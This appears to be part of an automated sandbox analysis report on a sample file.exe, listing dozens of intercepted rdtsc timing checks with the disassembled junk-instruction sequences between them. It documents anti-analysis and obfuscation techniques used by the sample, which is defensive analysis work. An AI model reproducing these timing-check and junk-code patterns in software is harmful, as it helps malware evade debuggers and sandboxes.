              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2464DE second address: 2464E3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2464E3 second address: 2464EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24E2CC second address: 24E2D6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F466925DD96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25264E second address: 25265A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F4668B9A726h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25280E second address: 25282D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F466925DDA3h 0x0000000b jl 00007F466925DD96h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25296D second address: 252983 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4668B9A72Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 252983 second address: 252989 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 252989 second address: 252993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4668B9A726h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 252993 second address: 252997 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 252997 second address: 2529BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4668B9A738h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2529BA second address: 2529D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F466925DDA3h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 252B27 second address: 252B2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 252B2C second address: 252B32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 252B32 second address: 252B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 252B38 second address: 252B3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 252B3C second address: 252B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4668B9A736h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007F4668B9A732h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push ecx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 252E21 second address: 252E27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2531DA second address: 2531E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F4668B9A726h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2531E8 second address: 25320A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F466925DD9Fh 0x0000000c jmp 00007F466925DD9Ch 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25735F second address: 25738A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 jmp 00007F4668B9A730h 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4668B9A732h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25AD28 second address: 25AD2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25AD2C second address: 25AD32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25F0FB second address: 25F0FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25F0FF second address: 25F103 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25F293 second address: 25F297 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25F297 second address: 25F2A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F4668B9A72Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25FBDE second address: 25FC24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466925DDA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jmp 00007F466925DDA0h 0x0000000f pop ebx 0x00000010 push ecx 0x00000011 jl 00007F466925DD96h 0x00000017 pushad 0x00000018 popad 0x00000019 pop ecx 0x0000001a popad 0x0000001b push ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e js 00007F466925DD96h 0x00000024 jbe 00007F466925DD96h 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25FC24 second address: 25FC3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4668B9A737h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1DBE22 second address: 1DBE3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466925DD9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F466925DDA6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1DBE3C second address: 1DBE52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4668B9A72Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007F4668B9A726h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25EDA5 second address: 25EDC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F466925DD96h 0x0000000a popad 0x0000000b popad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F466925DDA5h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 265FC9 second address: 265FE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F4668B9A738h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 265FE9 second address: 266006 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F466925DDA2h 0x00000008 pushad 0x00000009 jl 00007F466925DD96h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 266006 second address: 266012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F4668B9A726h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 266012 second address: 26601E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1EC6C5 second address: 1EC6EB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4668B9A726h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F4668B9A72Fh 0x00000012 push esi 0x00000013 pop esi 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 push ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1EC6EB second address: 1EC6F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 265393 second address: 265397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 265397 second address: 2653BB instructions: 0x00000000 rdtsc 0x00000002 jp 00007F466925DD96h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007F466925DDA8h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2656B2 second address: 2656B7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2656B7 second address: 2656EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F466925DDA7h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F466925DDA4h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2659B3 second address: 2659CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 jmp 00007F4668B9A730h 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 269500 second address: 26950A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F466925DD96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26950A second address: 269510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 269510 second address: 26952C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F466925DDA6h 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22BDF1 second address: 22BDF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22BDF5 second address: 22BDFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22BDFB second address: 22BE2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4668B9A738h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4668B9A730h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22C1ED second address: 22C1F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22C1F1 second address: 22C203 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4668B9A72Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22C2C7 second address: 22C2CD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22C2CD second address: 22C2F9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jc 00007F4668B9A72Eh 0x0000000f jbe 00007F4668B9A728h 0x00000015 push eax 0x00000016 pop eax 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F4668B9A72Dh 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22C2F9 second address: 22C2FF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22C2FF second address: 22C33A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007F4668B9A726h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [eax] 0x00000010 jmp 00007F4668B9A733h 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F4668B9A731h 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22C33A second address: 22C343 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22CDB8 second address: 22CDBD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22D0F0 second address: 20C375 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F466925DD96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e js 00007F466925DD9Bh 0x00000014 push ebx 0x00000015 call 00007F466925DDA7h 0x0000001a mov dword ptr [ebp+122D364Ah], ecx 0x00000020 pop edx 0x00000021 pop edx 0x00000022 lea eax, dword ptr [ebp+12480977h] 0x00000028 adc edx, 54164FDAh 0x0000002e push eax 0x0000002f push ecx 0x00000030 jmp 00007F466925DD9Fh 0x00000035 pop ecx 0x00000036 mov dword ptr [esp], eax 0x00000039 push 00000000h 0x0000003b push esi 0x0000003c call 00007F466925DD98h 0x00000041 pop esi 0x00000042 mov dword ptr [esp+04h], esi 0x00000046 add dword ptr [esp+04h], 0000001Ah 0x0000004e inc esi 0x0000004f push esi 0x00000050 ret 0x00000051 pop esi 0x00000052 ret 0x00000053 call dword ptr [ebp+122D2109h] 0x00000059 push eax 0x0000005a push edx 0x0000005b push ecx 0x0000005c jmp 00007F466925DDA9h 0x00000061 push ebx 0x00000062 pop ebx 0x00000063 pop ecx 0x00000064 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2697E4 second address: 2697F3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2697F3 second address: 2697FB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2697FB second address: 26980B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F4668B9A726h 0x0000000a jnc 00007F4668B9A726h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 269C3B second address: 269C3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26C91B second address: 26C93D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4668B9A72Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4668B9A72Fh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26C93D second address: 26C96A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F466925DD96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jbe 00007F466925DDD3h 0x00000014 jmp 00007F466925DDA6h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26C96A second address: 26C989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4668B9A739h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26C64A second address: 26C658 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F466925DD96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26C658 second address: 26C65C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26C65C second address: 26C662 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1EE1A7 second address: 1EE1CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push edx 0x00000007 jmp 00007F4668B9A733h 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F4668B9A726h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1EE1CB second address: 1EE1CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 270EF1 second address: 270EF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 270EF5 second address: 270F01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27092D second address: 270940 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4668B9A72Ch 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 270940 second address: 27094C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 270BA1 second address: 270BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 270BA5 second address: 270BC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466925DD9Fh 0x00000007 jc 00007F466925DD96h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 270BC4 second address: 270BC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 270BC8 second address: 270BF5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F466925DD96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F466925DDA6h 0x00000012 pushad 0x00000013 jnp 00007F466925DD96h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 270BF5 second address: 270C05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4668B9A72Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 270C05 second address: 270C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 270C09 second address: 270C0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 275FAC second address: 275FC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F466925DD96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F466925DD96h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 275FC2 second address: 275FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 275FC6 second address: 275FE9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F466925DDA6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 276422 second address: 276438 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnl 00007F4668B9A726h 0x0000000b popad 0x0000000c jne 00007F4668B9A72Eh 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 276587 second address: 2765A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F466925DD9Ch 0x0000000c jmp 00007F466925DD9Ah 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2765A4 second address: 2765A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1DBDF8 second address: 1DBE22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 jng 00007F466925DD96h 0x0000000c js 00007F466925DD96h 0x00000012 jmp 00007F466925DDA1h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22CA79 second address: 22CA9F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4668B9A72Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d jmp 00007F4668B9A72Ah 0x00000012 pop eax 0x00000013 jnc 00007F4668B9A72Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22CA9F second address: 22CAC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 movsx edi, bx 0x00000009 push 00000004h 0x0000000b mov cx, B1E1h 0x0000000f push eax 0x00000010 jg 00007F466925DDAEh 0x00000016 pushad 0x00000017 jmp 00007F466925DDA0h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2767F8 second address: 276817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 jp 00007F4668B9A74Ah 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F4668B9A72Ah 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 276817 second address: 27681D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2773E6 second address: 2773EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2773EC second address: 2773F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
